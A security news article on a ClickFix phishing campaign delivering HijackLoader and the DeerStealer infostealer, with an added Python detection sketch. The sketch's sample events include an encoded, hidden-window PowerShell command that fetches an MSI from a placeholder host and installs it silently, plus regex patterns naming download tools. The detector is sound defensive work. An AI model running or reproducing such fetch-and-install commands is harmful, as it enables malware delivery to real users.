Security researchers have observed a new wave of cyber attacks involving HijackLoader and DeerStealer, in which phishing tactics lure victims into running malicious commands themselves.
According to eSentire's Threat Response Unit (TRU), which discovered the campaign, ClickFix is used as the initial access vector.
Victims are directed to a phishing page that encourages them to run a PowerShell command via the Windows Run prompt. This command downloads an installer called NOW.MSI, which sets off a chain of actions culminating in the execution of HijackLoader and the release of the DeerStealer payload.
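The ClickFix chain described above leaves a recognisable footprint in process-creation telemetry: PowerShell spawned by explorer.exe (the Run prompt), a hidden window, an encoded command, and a decoded script that fetches an MSI and hands it to msiexec. The following detection sketch is an added example and is not eSentire's code; the events it scans are constructed samples, the URL example.invalid is a placeholder, and the field names (`parent`, `image`, `cmdline`) are an assumed simplification of a Sysmon Event ID 1 or EDR record.

```python
import base64
import re

# --- Constructed sample process-creation events (not real telemetry) ---------
# Fields mimic the subset of a Sysmon Event ID 1 / EDR record a detection
# would look at: parent image, image, and the full command line.

def encode_ps(script: str) -> str:
    """PowerShell's -EncodedCommand takes base64 of the UTF-16LE script text."""
    return base64.b64encode(script.encode("utf-16le")).decode("ascii")

SAMPLE_EVENTS = [
    {   # benign: an admin runs a script from a console, nothing encoded
        "id": 1, "parent": "cmd.exe", "image": "powershell.exe",
        "cmdline": "powershell.exe -File C:\\ops\\rotate-logs.ps1",
    },
    {   # ClickFix-style: pasted into Win+R, so explorer.exe is the parent;
        # hidden window, encoded command that fetches an MSI and runs msiexec
        "id": 2, "parent": "explorer.exe", "image": "powershell.exe",
        "cmdline": "powershell.exe -w hidden -nop -ep bypass -enc "
                   + encode_ps("Invoke-WebRequest http://example.invalid/now.msi "
                               "-OutFile $env:TEMP\\now.msi; "
                               "msiexec /i $env:TEMP\\now.msi /qn"),
    },
    {   # encoded and launched from explorer.exe, but no download/installer stage
        "id": 3, "parent": "explorer.exe", "image": "powershell.exe",
        "cmdline": "powershell.exe -enc "
                   + encode_ps("Get-Date | Out-File $env:TEMP\\t.txt"),
    },
]

DOWNLOAD_RE = re.compile(
    r"invoke-webrequest|\biwr\b|downloadfile|downloadstring|"
    r"start-bitstransfer|\bcurl\b|\bwget\b", re.I)
INSTALLER_RE = re.compile(r"\.msi\b|\bmsiexec\b", re.I)
HIDDEN_RE = re.compile(r"-w\S*\s+hidden", re.I)   # -w / -win / -windowstyle hidden

def decode_encoded_command(cmdline: str):
    """Return the decoded script if the command line carries -EncodedCommand
    (or any prefix PowerShell accepts: -e, -ec, -enc, ...), else None."""
    tokens = cmdline.split()
    for i, tok in enumerate(tokens[:-1]):
        t = tok.lower()
        if len(t) >= 2 and "-encodedcommand".startswith(t):
            try:
                return base64.b64decode(tokens[i + 1]).decode("utf-16le")
            except (ValueError, UnicodeDecodeError):
                return None
    return None

def classify(event: dict):
    """Return (suspicious, reasons) for one process-creation event."""
    reasons = []
    cmdline = event["cmdline"]
    if event["image"].lower() not in ("powershell.exe", "pwsh.exe"):
        return False, reasons
    if event["parent"].lower() == "explorer.exe":
        reasons.append("parent is explorer.exe (Run prompt / pasted command)")
    decoded = decode_encoded_command(cmdline)
    if decoded is not None:
        reasons.append("encoded command")
    if HIDDEN_RE.search(cmdline):
        reasons.append("hidden window")
    script = decoded if decoded is not None else cmdline
    if DOWNLOAD_RE.search(script):
        reasons.append("download cmdlet")
    if INSTALLER_RE.search(script):
        reasons.append("MSI / msiexec stage")
    # Flag when the fetch-then-install chain is present, or when three or more
    # weaker signals stack up (each alone is common in ordinary admin activity).
    chain = "download cmdlet" in reasons and "MSI / msiexec stage" in reasons
    return chain or len(reasons) >= 3, reasons

def scan(events):
    """Map event id -> reasons for every event classified as suspicious."""
    flagged = {}
    for ev in events:
        suspicious, reasons = classify(ev)
        if suspicious:
            flagged[ev["id"]] = reasons
    return flagged

if __name__ == "__main__":
    for ev_id, reasons in scan(SAMPLE_EVENTS).items():
        print(f"event {ev_id}: " + "; ".join(reasons))
```

Decoding the encoded command before matching is the important step: the download and msiexec stages are invisible in the raw command line, and a rule that only keys on `-enc` would also fire on the harmless third event. The explorer.exe parent is what distinguishes a command pasted into the Run prompt from a script launched by a scheduler or console.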
eSentire said that HijackLoader has been active since 2023 and is known for its use of steganography, in particular hiding configuration data in PNG images.
Once executed, the loader uses legitimate binaries to run unsigned malicious code, which is ultimately injected into memory.
DeerStealer's expansive theft capabilities
DeerStealer, also marketed as XFiles Spyware on dark-web forums by a user called LuciferXfiles, is a subscription-based infostealer with capabilities that go well beyond basic credential theft.
The malware:
- Extracts data from more than 50 web browsers
- Hijacks 14+ cryptocurrency wallet types via clipboard monitoring
- Harvests login details from messengers, FTP, VPN, email and gaming clients
- Includes hidden VNC for stealthy remote access
- Uses encrypted HTTPS channels for command-and-control (C2) communication
The malware also uses modular obfuscation and virtual machines to decode strings, which hinders traditional analysis techniques.
Read more about malware loader techniques: CoffeeLoader Malware Loader Linked to SmokeLoader Operations
Command-Line Trickery
The attack begins with the user unwittingly executing an encoded command that retrieves the installer.
Although the installer uses a signed binary from Comodo, it loads a tampered DLL to hijack execution. This modified DLL eventually decodes the next stage, which injects DeerStealer into another legitimate process.
Despite the public availability of tools that decode HijackLoader's configuration, attackers continue to use the same methods, which suggests either ignorance of or disregard for the detection risk.
Expanding threat, evolving tools
eSentire warned that DeerStealer is constantly evolving, with upcoming features including macOS support, AI-driven improvements and additional client targets.
Threat actors subscribing to higher pricing tiers, up to $3000 per month, receive extras such as payload signing and advanced customization.
As these tools become more advanced, defenders must remain vigilant.
eSentire's TRU recommends continuous threat monitoring and updating endpoint protection mechanisms to detect emerging loaders and stealers before damage is done.